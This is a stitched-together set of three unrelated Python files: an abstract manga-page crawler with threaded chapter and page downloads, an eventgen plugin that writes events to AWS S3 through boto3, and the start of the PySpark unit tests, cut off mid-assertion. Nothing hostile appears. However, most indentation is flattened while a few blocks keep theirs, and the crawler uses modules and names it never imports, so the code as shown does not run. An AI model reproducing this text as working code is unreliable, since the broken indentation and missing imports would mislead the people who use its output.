from abc import ABC, abstractmethod
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup
logger = logging.getLogger(__name__)
console = logging.getLogger("console")
####################################################################################################
# PAGE
####################################################################################################
class Page:
"""
The page of the manga.
Parameters:
idx: The index/order of the page.
pageUrl: The main URL of the HTML of the page.
dirPath: The path of the directory where the page image will be saved.
imageUrl: The URL of the page image.
"""
def __init__(self, idx: int, pageUrl: str, dirPath: str, imageUrl: str = None) -> None:
if idx < 1:
raise ValueError('The index must be a positive number.')
if pageUrl is None or pageUrl == '':
raise ValueError('The pageUrl must not be None.')
if dirPath is None or dirPath == '':
raise ValueError('The dirPath must not be None.')
self.idx: int = idx
self.pageUrl: str = pageUrl
self.dirPath: str = dirPath
self.imageUrl: str = imageUrl
def fileExists(self) -> bool:
"""
Returns true if the downloaded image already exists.
Returns false if the filepath is None or if the downloaded image does not exist.
"""
filepath = self.filepath
if filepath is None:
return False
return os.path.exists(filepath)
@property
def filename(self) -> str:
"""
The filename of the downloaded image.
None if the imageUrl is None.
"""
if self.imageUrl is None:
return None
_, ext = os.path.splitext(self.imageUrl)
return f'page{self.idx:04}{ext}'
@property
def filepath(self) -> str:
"""
The filepath of the downloaded image.
None if the filename is None.
"""
filename = self.filename
if filename is None:
return None
return os.path.join(self.dirPath, filename)
def download(self) -> None:
"""
Download the image.
Raises:
An exception if anything went wrong while downloading image.
"""
if self.imageUrl is None:
logger.error('Cannot download page %d (%s), imageUrl is None.', self.idx, self.pageUrl)
raise ValueError('Cannot download image, imageUrl is None.')
response = requests.get(self.imageUrl, stream=True)
response.raise_for_status()
if not os.path.exists(self.dirPath):
os.makedirs(self.dirPath)
with open(self.filepath, 'wb') as outputFile:
shutil.copyfileobj(response.raw, outputFile)
del response
def toDict(self) -> dict:
"""
Returns the dictionary representation of the Page.
"""
return {
'idx': self.idx,
'pageUrl': self.pageUrl,
'dirPath': os.path.abspath(self.dirPath),
'imageUrl': self.imageUrl
}
####################################################################################################
# CHAPTER
####################################################################################################
class Chapter:
"""
The chapter of the manga.
Parameters:
idx: The index/order of the chapter. Note that this may be different from
the chapter title if there are some special chapters (e.g. Chapter 10.5).
url: The main URL of the chapter.
dirPath: The path of the directory where the chapter will be saved.
title: The title of the chapter. If None, the title will be set to the index.
pages: The pages of the chapter.
"""
def __init__(self, idx: int, url: str, dirPath: str, title: str = None,
pages: List[Page] = None) -> None:
if idx < 1:
logger.error('Failed to initialize chapter, index %d is invalid.', idx)
raise ValueError('The index must be a positive number.')
if url is None or url == '':
logger.error('Failed to initialize chapter %d, URL is None.', idx)
raise ValueError('The URL must not be None.')
if title is None:
title = f'chapter{idx:04}'
self.idx: int = idx
self.url: str = url
self.title: str = title
self.dirPath: str = dirPath
self.pages: List[Page] = [] if pages is None else pages
@property
def hasPages(self) -> bool:
"""
True if the pages list is populated with pages. False otherwise.
"""
return self.pages is not None and len(self.pages) > 0
@property
def isDownloaded(self) -> bool:
"""
True if the pages list is populated with pages and all of them
have already been downloaded. False otherwise.
"""
return self.hasPages and all(page.fileExists() for page in self.pages)
def toDict(self) -> dict:
"""
Returns the dictionary representation of the Chapter.
"""
return {
'idx': self.idx,
'url': self.url,
'title': self.title,
'dirPath': os.path.abspath(self.dirPath),
'pages': [page.toDict() for page in self.pages]
}
####################################################################################################
# BASE MANGA CRAWLER
####################################################################################################
class BaseMangaCrawler(ABC):
"""
An abstract base class for a Manga.
Attributes:
url: The main URL of the manga.
baseDirPath: The path of the base output directory.
dirPath: The path of the directory where the manga will be saved.
cachePath: The path of the JSON cache file.
title: The title of the manga.
chapters: The chapters of the manga.
numChapterThreads: The number of chapter processing threads.
numPageThreads: The number of page downloading threads.
Raises:
ValueError: When the given parameters are invalid.
FileNotFoundError: When the cachePath is specified, but file was not found.
"""
def __init__(self, url: str, baseDirPath: str, dirPath: str = None,
cachePath: str = None, title: str = None, chapters: List[Chapter] = None,
numChapterThreads: int = 3, numPageThreads: int = 5) -> None:
super().__init__()
if url is None or url == '':
logger.error('Failed to initialize Manga, URL is None.')
raise ValueError('The URL must not be None.')
if baseDirPath is None or baseDirPath == '':
logger.error('Failed to initialize Manga, baseDirPath is None.')
raise ValueError('The baseDirPath must not be None.')
if cachePath is not None and not os.path.exists(cachePath):
logger.error('Failed to initialize Manga, cache file not found at %s.', cachePath)
raise FileNotFoundError(f'Cache file not found at {cachePath}.')
if numChapterThreads < 1:
logger.error('Failed to initialize Manga, invalid numChapterThreads: %d.',
numChapterThreads)
raise ValueError('Invalid number of chapter processing threads.')
if numPageThreads < 1:
logger.error('Failed to initialize Manga, invalid numPageThreads: %d.',
numPageThreads)
raise ValueError('Invalid number of page downloading threads.')
self.url: str = url
self.title: str = title
self.baseDirPath: str = baseDirPath
self.dirPath: str = dirPath
self.cachePath: str = cachePath
self.chapters: List[Chapter] = [] if chapters is None else chapters
self.numChapterThreads: int = numChapterThreads # The number of chapter threads
self.numPageThreads: int = numPageThreads # The number of page threads
self._killEvent = Event() # Terminates the download
self._chapterQueue = Queue() # The chapter processing queue
self._pageQueue = Queue() # The page processing queue
self._chapterThreads: List[Thread] = [] # The chapter worker threads
self._pageThreads: List[Thread] = [] # The page worker threads
self._chapterProgress: tqdm = None # The chapter progress bar
self._pageProgress: tqdm = None # The page progress bar
def toDict(self) -> dict:
"""
Returns the dictionary representation of the MangaCrawler.
"""
return {
'url': self.url,
'title': self.title,
'baseDirPath': os.path.abspath(self.baseDirPath),
'dirPath': os.path.abspath(self.dirPath),
'cachePath': os.path.abspath(self.cachePath),
'numChapterThreads': self.numChapterThreads,
'numPageThreads': self.numPageThreads,
'chapters': [chapter.toDict() for chapter in self.chapters]
}
#################################################################
# CACHE METHODS
#################################################################
def loadCache(self) -> bool:
"""
Load cache and update attributes. Does nothing if the cache path is not set.
Raises:
FileNotFoundError: If the cache file is specified but does not exist.
Returns:
True if the cache was loaded. False if there is no cached data.
"""
if self.cachePath is None:
return False
if not os.path.exists(self.cachePath):
logger.error('[%s] Failed to load cache, cache file not found at %s.',
self.url, self.cachePath)
raise FileNotFoundError(f'Cache file not found at {self.cachePath}.')
with open(self.cachePath, 'r', encoding='utf-8') as cacheFile:
cacheJson = json.load(cacheFile)
url = cacheJson['url']
baseDirPath = cacheJson['baseDirPath']
dirPath = cacheJson['dirPath']
cachePath = cacheJson['cachePath']
title = cacheJson['title']
numChapterThreads = cacheJson['numChapterThreads']
numPageThreads = cacheJson['numPageThreads']
def getPage(pageObj: Any) -> Page:
"""Convert JSON object to Page."""
idx = pageObj['idx']
pageUrl = pageObj['pageUrl']
dirPath = pageObj['dirPath']
imageUrl = pageObj['imageUrl']
return Page(idx, pageUrl, dirPath, imageUrl)
def getChapter(chapObj: Any) -> Chapter:
"""Convert JSON object to Chapter."""
idx = chapObj['idx']
url = chapObj['url']
dirPath = chapObj['dirPath']
title = chapObj['title']
pages = []
for pageObj in chapObj['pages']:
pages.append(getPage(pageObj))
return Chapter(idx, url, dirPath, title, pages)
chapters = []
for chapObj in cacheJson['chapters']:
chapters.append(getChapter(chapObj))
self.url = url
self.baseDirPath = baseDirPath
self.dirPath = dirPath
self.cachePath = cachePath
self.title = title
self.numChapterThreads = numChapterThreads
self.numPageThreads = numPageThreads
self.chapters = chapters
return True
def saveCache(self) -> None:
"""
Save the current data to the cache.
Raises:
ValueError: If the cache path is not set.
"""
if self.cachePath is None:
logger.error('[%s] Failed to save cache, cache path is not set.', self.url)
raise ValueError('The cache path is not set.')
with open(self.cachePath, 'w', encoding='utf-8') as cacheFile:
json.dump(self.toDict(), cacheFile, indent=4)
#################################################################
# DOWNLOAD
#################################################################
def terminate(self) -> None:
"""
Terminate the download by setting the kill event.
"""
logger.info('----- [%s] Kill event is set -----', self.url)
self._killEvent.set()
if self._chapterProgress is not None:
self._chapterProgress.close()
if self._pageProgress is not None:
self._pageProgress.close()
def download(self) -> None:
"""
        Download the manga: fetch the chapter list, then process chapters and
        download their pages using the worker threads.
"""
# Load the cache if the cachePath is already set
if self.cachePath is not None:
self.loadCache()
if self.url is None:
logger.error('Cannot download manga, the URL is None.')
console.error('Cannot download manga, the URL is None.')
return
logger.info('----- Starting download for %s -----', self.url)
# Initialize the title if it hasn't been set yet
self._initMangaTitle()
# If the title still hasn't been set, terminate download
if self.title is None or self.title == '':
console.error('Terminating download, failed to get manga title.')
return
console.info('Manga title: %s', self.title)
# Set the manga's dirPath and cachePath
if self.dirPath is None or self.dirPath == '':
dirName = BaseMangaCrawler.makeSafeFilename(self.title)
self.dirPath = os.path.join(self.baseDirPath, dirName)
self.cachePath = os.path.join(self.dirPath, 'cache.json')
# Now that the cachePath is already set, try to load the cache again, if it exists
if os.path.exists(self.cachePath):
self.loadCache()
# Add all chapters from the fetched chapter list to the current chapter list.
chapterList = self._fetchChapters()
for fetchedChapter in chapterList:
# Add the fetched chapter only if it does not exist in the current chapter list
if not any(fetchedChapter.title == chapter.title for chapter in self.chapters):
self.chapters.append(fetchedChapter)
# Re-sort the chapters list
self.chapters = sorted(self.chapters, key=lambda chapter: chapter.idx)
# Check the kill event
if self._killEvent.is_set():
return
# If no chapters were found, we cannot continue to process this manga
if len(self.chapters) == 0:
console.info("No chapters were found for '%s'.", self.title)
return
logger.info('[%s] Fetched %d chapters.', self.title, len(self.chapters))
# Populate the chapter queue
chapterQueueSize = 0
self._chapterQueue = Queue()
for chapter in self.chapters:
if not chapter.isDownloaded:
chapterQueueSize += 1
self._chapterQueue.put(chapter)
# Since we already know that self.chapters is not empty,
# if chapterQueueSize is zero at this point,
# it means that all chapters have already been downloaded.
# So we have nothing to process.
if chapterQueueSize == 0:
console.info('All %d chapters have already been downloaded.', len(self.chapters))
return
if chapterQueueSize < len(self.chapters):
alreadyDownloadedChapters = len(self.chapters) - chapterQueueSize
logger.info('[%s] Chapter queue contains %d chapters, '
'while %d chapters have already been downloaded.',
self.title, chapterQueueSize, alreadyDownloadedChapters)
console.info('Downloading...')
sleep(0.3)
# Initialize the progress bars
self._chapterProgress = tqdm(total=chapterQueueSize,
desc='Chapter Processing', unit='chapters')
self._pageProgress = tqdm(total=0, desc='Page Download', unit='pages')
# Start the chapter threads
self._chapterThreads = []
for _ in range(self.numChapterThreads):
t = Thread(target=self.processChapter)
self._chapterThreads.append(t)
t.start()
# Start the page threads
self._pageThreads = []
for _ in range(self.numPageThreads):
t = Thread(target=self.processPage)
self._pageThreads.append(t)
t.start()
# Wait for the threads to finish
while any(t.is_alive() for t in self._chapterThreads):
sleep(0.3)
while any(t.is_alive() for t in self._pageThreads):
sleep(0.3)
for t in self._chapterThreads:
t.join()
for t in self._pageThreads:
t.join()
# Close the progress bars
self._chapterProgress.close()
self._pageProgress.close()
#################################################################
# WORKER THREAD METHODS
#################################################################
def processChapter(self) -> None:
"""
Work function of the chapter threads.
"""
while True:
if self._killEvent.is_set():
return
            chapter: Chapter = None
            if not self._chapterQueue.empty():
                try:
                    # Get the chapter without blocking
                    chapter = self._chapterQueue.get(block=False)
# Skip this chapter if all its pages have already been downloaded
if chapter.isDownloaded:
self._chapterProgress.write(f'{chapter.title} is skipped.')
self._chapterProgress.update()
self._chapterQueue.task_done()
continue
# If the chapter is not skipped, continue on to the processing below
# If the chapter's pages are already known, process using those
if chapter.hasPages:
pages = chapter.pages
# Otherwise, fetch the chapter's pages
else:
pages = self._fetchPages(chapter)
chapter.pages = pages if pages is not None else []
# Check killEvent again
if self._killEvent.is_set():
return
# Append the pages into the page queue
appendedCount = 0
for page in chapter.pages:
# But only those whose image is not yet downloaded
if not page.fileExists():
appendedCount += 1
self._pageQueue.put((page, chapter))
# Update the progress bar total
self._pageProgress.total = self._pageProgress.total + appendedCount
self._chapterProgress.update()
self._chapterQueue.task_done()
except Empty:
# Just continue the loop if the queue is empty
continue
except Exception as err: # pylint: disable=broad-except
chapterTitle = chapter.title if chapter is not None else 'Unknown Chapter'
logger.exception('[%s] Something went wrong while processing %s, %s',
self.title, chapterTitle, err)
self._chapterProgress.write(f'Failed to process {chapterTitle}.')
self._chapterProgress.update()
self._chapterQueue.task_done()
continue
else: # If chapter queue is empty
self._chapterProgress.refresh()
break
def processPage(self) -> None:
"""
Work function of the page threads.
"""
while True:
if self._killEvent.is_set():
return
page: Page = None
chapter: Chapter = None
if not self._pageQueue.empty():
try:
page, chapter = self._pageQueue.get(block=False)
# If the image already exists in its filepath, skip this page
if page.fileExists():
self._pageProgress.update()
self._pageQueue.task_done()
logger.debug('[%s] Page %d of %s is skipped.',
self.title, page.idx, chapter.title)
continue
# If the file was not yet downloaded, this page won't be skipped,
# so we continue on to the processing below.
# Cannot process if both pageUrl and imageUrl are not set
if page.pageUrl is None and page.imageUrl is None:
chapterTitle = chapter.title if chapter.title is not None \
else f'Chapter{chapter.idx:04}'
                        logger.error("[%s] Failed to process page %d of %s, "
                                     "pageUrl and imageUrl are both None.",
                                     self.title, page.idx, chapterTitle)
self._chapterProgress.write(f'Cannot process page {page.idx} '
f'of {chapterTitle}, cannot find URL.')
self._pageProgress.update()
self._pageQueue.task_done()
continue
# Fetch the page HTML and parse the image URL from there
if page.imageUrl is None:
soup = BaseMangaCrawler.fetchHtmlSoup(page.pageUrl)
# self.parseImageUrl should not return None.
# Instead, it should raise an exception if something went wrong.
page.imageUrl = self.parseImageUrl(soup)
# Check the kill event before downloading the image
if self._killEvent.is_set():
return
# Download the image
page.download()
self._pageProgress.update()
self._pageQueue.task_done()
except Empty:
# Just continue the loop if the queue is empty
continue
except Exception as err: # pylint: disable=broad-except
                    pageNum = f'Page{page.idx:04}' if page is not None else 'Unknown Page'
                    if chapter is not None:
                        chapterTitle = chapter.title if chapter.title is not None \
                            else f'Chapter{chapter.idx:04}'
                    else:
                        chapterTitle = 'Unknown Chapter'
logger.exception('[%s] Something went wrong while processing %s of %s, %s',
self.title, pageNum, chapterTitle, err)
self._pageProgress.update()
self._pageQueue.task_done()
continue
else: # If page queue is empty
if self._killEvent.is_set():
return
                # If all chapter threads are dead/finished
if all(not t.is_alive() for t in self._chapterThreads):
return
sleep(0.1)
#################################################################
# PRIVATE METHODS
#################################################################
def _initMangaTitle(self) -> None:
"""
If the manga title hasn't been set yet,
fetch the manga soup and initialize the title.
"""
if self.url is None or self.url == '':
logger.error('Failed to initialize manga title, manga URL is None.')
raise ValueError('Manga URL must not be None.')
if self.title is not None and self.title != '':
# Do nothing if title is already set
return
try:
soup = BaseMangaCrawler.fetchHtmlSoup(self.url)
except Exception as err: # pylint: disable=broad-except
logger.exception('Failed to fetch manga HTML: %s, %s', self.url, err)
return
try:
self.title = self.parseMangaTitle(soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('Failed to parse manga title from %s, %s', self.url, err)
def _fetchChapters(self) -> List[Chapter]:
"""
Fetch all paginations of the manga and parse all chapters.
Returns:
The list of Chapters. Returns None if something went wrong
or if the kill event was set.
"""
result: List[Chapter] = []
url = self.url
while url is not None:
# If kill event is set, stop the download
if self._killEvent.is_set():
break
console.info('Fetching chapters from %s...', url)
try:
# Fetch the manga HTML of the current pagination
soup = BaseMangaCrawler.fetchHtmlSoup(url)
# Get all the chapters from this paginated manga soup and append it to the list
chapters = self.parseChapters(url, soup)
result.extend(chapters)
# If manga is not paginated, all chapters are in the HTML soup
# that we just finished processing, so we terminate the loop.
if not self.isMangaPaginated():
break
# Get the URL of the next manga HTML pagination
url = self.getNextMangaPagination(soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('[%s] Failed to load chapters from %s, %s', self.title, url, err)
console.error('Failed to load the chapters in %s', url)
break
return result
def _fetchChapterTitle(self, chapter) -> str:
"""
Fetch the main chapter HTML and parse the title.
Returns the currently set chapter title if something went wrong.
Returns:
The title of the chapter.
"""
try:
title = chapter.title
soup = BaseMangaCrawler.fetchHtmlSoup(chapter.url)
title = self.parseChapterTitle(chapter, soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('[%s] Failed to fetch chapter title from %s, %s',
self.title, chapter.url, err)
return title
def _fetchPages(self, chapter) -> List[Page]:
"""
Fetch all paginations of the chapter and parse all pages.
Returns:
The list of all pages of the given chapter.
"""
result: List[Page] = []
url = chapter.url
while url is not None:
# Terminate the thread if kill event is set
if self._killEvent.is_set():
break
try:
# Fetch the chapter HTML of the current pagination
soup = BaseMangaCrawler.fetchHtmlSoup(url)
# Get all the pages from this paginated chapter soup and append it to the list
pages = self.parsePages(url, chapter, soup)
result.extend(pages)
chapter.pages.extend(pages)
# If chapter is not paginated, all pages are in the HTML soup
# that we just finished processing, so we terminate the loop.
if not self.isChapterPaginated():
break
# Get the URL of the next chapter HTML pagination
url = self.getNextChapterPagination(soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('[%s] Failed to load pages of %s from %s, %s',
self.title, chapter.title, url, err)
self._chapterProgress.write(f'Failed to load the chapter URL: {url}')
break
return result
#################################################################
# ABSTRACT METHODS
#################################################################
@abstractmethod
def parseMangaTitle(self, mangaSoup: BeautifulSoup) -> str:
"""
Parse the manga title from the soup.
Parameters:
mangaSoup: The HTML soup of the manga.
Raises:
Any and all exceptions if and when they occur.
Returns:
The manga title.
"""
@abstractmethod
def parseChapters(self, url: str, mangaSoup: BeautifulSoup) -> List[Chapter]:
"""
Parse the manga soup and create Chapters.
Parameters:
url: The URL of the manga.
mangaSoup: The HTML soup of the manga.
Raises:
Any and all exceptions if and when they occur.
Returns:
The list of Chapters created from the soup.
"""
@abstractmethod
def isMangaPaginated(self) -> bool:
"""
Returns true if the manga is paginated.
In other words, if not all chapters are listed on the main manga HTML page.
"""
@abstractmethod
def getNextMangaPagination(self, mangaSoup: BeautifulSoup) -> str:
"""
Get the URL of the next pagination of the manga HTML page.
Returns None if there is no next pagination.
Parameters:
mangaSoup: The HTML soup of the manga.
Raises:
Any and all exceptions if and when they occur.
Returns:
The URL of the next pagination. None if there is no next pagination.
"""
@abstractmethod
def isChapterPaginated(self) -> bool:
"""
Returns true if the chapter is paginated.
In other words, if not all pages are listed on the chapter HTML page.
"""
@abstractmethod
def getNextChapterPagination(self, chapterSoup: BeautifulSoup) -> str:
"""
Get the URL of the next pagination of the chapter HTML page.
Returns None if there is no next pagination.
Parameters:
chapterSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The URL of the next pagination. None if there is no next pagination.
"""
@abstractmethod
def parseChapterTitle(self, chapter: Chapter, chapterSoup: BeautifulSoup) -> str:
"""
Parse the chapter title from the soup.
Parameters:
chapter: The chapter.
chapterSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The chapter title.
"""
@abstractmethod
def parsePages(self, url: str, chapter: Chapter, chapterSoup: BeautifulSoup) -> List[Page]:
"""
Parse the chapter soup and create Pages.
Parameters:
url: The URL of the chapter.
chapter: The chapter.
chapterSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The list of Pages created from the soup.
"""
@abstractmethod
def parseImageUrl(self, pageSoup: BeautifulSoup) -> str:
"""
Parse the image URL from the soup.
Parameters:
pageSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The image URL.
"""
#################################################################
# HELPER METHODS
#################################################################
@staticmethod
@lru_cache(maxsize=32)
def fetchHtmlSoup(url: str) -> BeautifulSoup:
"""
Fetch an HTML page and return its soup.
Raises an error if the fetching or the parsing failed.
"""
try:
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
return soup
except Exception as err:
logger.exception('Failed to fetch HTML soup of %s, %s', url, err)
raise err
@staticmethod
@lru_cache(maxsize=32)
def makeSafeFilename(filename: str) -> str:
"""
Makes the filename Windows-safe by removing unsafe characters.
"""
keepChars = (' ', '.', '_', '-', "'", '(', ')')
return "".join(c for c in filename if c.isalnum() or c in keepChars).strip()
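# --- Illustrative sketch, not part of the crawler library ---
# A minimal concrete subclass showing which abstract methods a site-specific crawler
# must provide. The imaginary-site CSS selectors, the non-paginated layout and the
# Page constructor signature (idx, pageUrl, dirPath, imageUrl) are assumptions made
# only for illustration.
class ExampleSiteCrawler(BaseMangaCrawler):
    def parseMangaTitle(self, mangaSoup: BeautifulSoup) -> str:
        return mangaSoup.select_one('h1.title').get_text(strip=True)
    def parseChapters(self, url: str, mangaSoup: BeautifulSoup) -> List[Chapter]:
        links = mangaSoup.select('a.chapter-link')
        baseDir = self.dirPath if self.dirPath else self.baseDirPath
        return [Chapter(idx, link['href'], os.path.join(baseDir, f'chapter{idx:04}'))
                for idx, link in enumerate(reversed(links), start=1)]
    def isMangaPaginated(self) -> bool:
        return False  # assume all chapters are listed on the main manga page
    def getNextMangaPagination(self, mangaSoup: BeautifulSoup) -> str:
        return None
    def isChapterPaginated(self) -> bool:
        return False  # assume all pages are listed on the chapter page
    def getNextChapterPagination(self, chapterSoup: BeautifulSoup) -> str:
        return None
    def parseChapterTitle(self, chapter: Chapter, chapterSoup: BeautifulSoup) -> str:
        return chapterSoup.select_one('h2.chapter-title').get_text(strip=True)
    def parsePages(self, url: str, chapter: Chapter, chapterSoup: BeautifulSoup) -> List[Page]:
        imgs = chapterSoup.select('div.reader img')
        return [Page(idx, url, chapter.dirPath, img['src'])
                for idx, img in enumerate(imgs, start=1)]
    def parseImageUrl(self, pageSoup: BeautifulSoup) -> str:
        return pageSoup.select_one('div.reader img')['src']
# Usage sketch: ExampleSiteCrawler('https://example.com/manga/x', 'out').download()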
|
awss3.py
|
from __future__ import division
from outputplugin import OutputPlugin
import requests
try:
import boto3
import botocore.exceptions
boto_imported = True
except ImportError:
boto_imported = False
import uuid
import datetime
import threading
import logging
def threaded(fn):
    """Decorator that runs the wrapped function in a background thread and returns the Thread."""
    def wrapper(*args, **kwargs):
        thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
        thread.start()
        return thread
    return wrapper
class AwsS3OutputPlugin(OutputPlugin):
'''
    The awsS3 output plugin sends generated events directly to AWS S3
    through the boto3 API. To use this plugin, you need to supply the
    AWS settings in the config file.
'''
name = 'awsS3'
useOutputQueue = False
# MAXQUEUELENGTH = 100
validSettings = ['awsS3BucketName', 'awsS3CompressionType',
'awsS3EventType', 'awsS3ObjectPrefix',
'awsS3ObjectSuffix', 'awsRegion', 'awsKeyId',
'awsSecretKey', 'awsS3EventPerKey']
defaultableSettings = ['awsKeyId', 'awsSecretKey', 'awsS3EventType',
'awsS3CompressionType', 'awsS3ObjectPrefix',
'awsS3ObjectSuffix']
def __init__(self, sample):
# Override maxQueueLength to EventPerKey so that each flush
# will generate one aws key
if sample.awsS3EventPerKey:
sample.maxQueueLength = sample.awsS3EventPerKey
OutputPlugin.__init__(self, sample)
if not boto_imported:
self.logger.error("There is no boto3 or botocore library available")
return
# disable any "requests" warnings
requests.packages.urllib3.disable_warnings()
# Bind passed in samples to the outputter.
self.awsS3compressiontype = sample.awsS3CompressionType if hasattr(
sample,
'awsS3CompressionType') and sample.awsS3CompressionType else None
self.awsS3eventtype = sample.awsS3EventType if hasattr(
sample, 'awsS3EventType') and sample.awsS3EventType else 'syslog'
self.awsS3objectprefix = sample.awsS3ObjectPrefix if hasattr(
sample, 'awsS3ObjectPrefix') and sample.awsS3ObjectPrefix else ""
self.awsS3objectsuffix = sample.awsS3ObjectSuffix if hasattr(
sample, 'awsS3ObjectSuffix') and sample.awsS3ObjectSuffix else ""
self.awsS3bucketname = sample.awsS3BucketName
self.logger.debug("Setting up the connection pool for %s in %s" %
(self._sample.name, self._app))
self._client = None
self._createConnections(sample)
self.logger.debug("Finished init of awsS3 plugin.")
def _createConnections(self, sample):
try:
if hasattr(sample, 'awsKeyId') and hasattr(sample, 'awsSecretKey'):
self._client = boto3.client(
"s3",
region_name=sample.awsRegion,
aws_access_key_id=sample.awsKeyId,
aws_secret_access_key=sample.awsSecretKey)
if self._client is None:
msg = '''
[your_eventgen_stanza]
awsKeyId = YOUR_ACCESS_KEY
awsSecretKey = YOUR_SECRET_KEY
'''
                    self.logger.error(
                        "Failed to init boto3 client, you should define correct "
                        "'awsKeyId' and 'awsSecretKey' in the eventgen conf, e.g.: %s" % msg)
                    raise ValueError("boto3 client init failed, missing AWS credentials")
else:
self._client = boto3.client('s3', region_name=sample.awsRegion)
except Exception as e:
            self.logger.error("Failed to init boto3 client: exception = %s" % e)
raise e
# Try list bucket method to validate if the connection works
try:
self._client.list_buckets()
except botocore.exceptions.NoCredentialsError:
msg = '''
[default]
aws_access_key_id = YOUR_ACCESS_KEY
aws_secret_access_key = YOUR_SECRET_KEY
'''
            self.logger.error("Failed to init boto3 client, you should create "
                              "'~/.aws/credentials' with credential info %s" % msg)
raise
self.logger.debug("Init conn done, conn = %s" % self._client)
    def _sendPayloads(self, payload):
        numberevents = len(payload)
        self.logger.debug("Sending %s events to s3 key" % numberevents)
        self._transmitEvents(payload)
def _transmitEvents(self, payloadstring):
self.logger.debug("Transmission called with payloadstring event number: %d "
% len(payloadstring))
records = "".join(payloadstring)
# Different key prefix for different log type
if self.awsS3eventtype == 'elbaccesslog':
s3keyname = self.awsS3objectprefix + datetime.datetime.utcnow(
).strftime("%Y%m%dT%H%MZ") + '_' + str(uuid.uuid1(
)) + self.awsS3objectsuffix
elif self.awsS3eventtype == 's3accesslog':
s3keyname = self.awsS3objectprefix + datetime.datetime.utcnow(
).strftime("%Y-%m-%d-%H-%M-%S") + '-' + str(uuid.uuid1()).replace(
'-', '').upper()[0:15] + self.awsS3objectsuffix
else:
s3keyname = self.awsS3objectprefix + datetime.datetime.utcnow(
).isoformat() + str(uuid.uuid1()) + self.awsS3objectsuffix
self.logger.debugv("Uploading %d events into s3 key: %s " %
(len(records), s3keyname))
if self.awsS3compressiontype == 'gz':
import StringIO
import gzip
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(records)
records = out.getvalue()
try:
response = self._client.put_object(Bucket=self.awsS3bucketname,
Key=s3keyname,
Body=records)
self.logger.debugv("response = %s" % response)
except Exception as e:
self.logger.error("Failed for exception: %s" % e)
            self.logger.debugv("Failed sending events, payload: %s" %
                               (payloadstring))
raise e
def flush(self, q):
self.logger.debug("Flush called on awsS3 plugin with length %d" % len(q))
if len(q) > 0:
try:
payload = []
self.logger.debug("Currently being called with %d events" % len(q))
for event in q:
if event.get('_raw') is None:
self.logger.error(
'failure outputting event, does not contain _raw')
else:
payload.append(event['_raw'])
self.logger.debug(
"Finished processing events, sending all to AWS S3")
self._sendPayloads(payload)
except Exception as e:
import traceback
                self.logger.error(traceback.format_exc())
self.logger.error('failed sending events, reason: %s ' % e)
def _setup_logging(self):
self.logger = logging.getLogger('eventgen')
def load():
"""Returns an instance of the plugin"""
return AwsS3OutputPlugin
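# --- Illustrative sketch, not part of the plugin ---
# A hypothetical eventgen sample stanza wiring output to this plugin; the bucket,
# region and credential values are placeholders, and the option names come from
# validSettings above.
#
# [my_sample.log]
# outputMode = awsS3
# awsS3BucketName = my-example-bucket
# awsRegion = us-east-1
# awsS3EventType = syslog
# awsS3CompressionType = gz
# awsS3ObjectPrefix = eventgen/
# awsS3ObjectSuffix = .log
# awsKeyId = YOUR_ACCESS_KEY
# awsSecretKey = YOUR_SECRET_KEY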
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 14
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
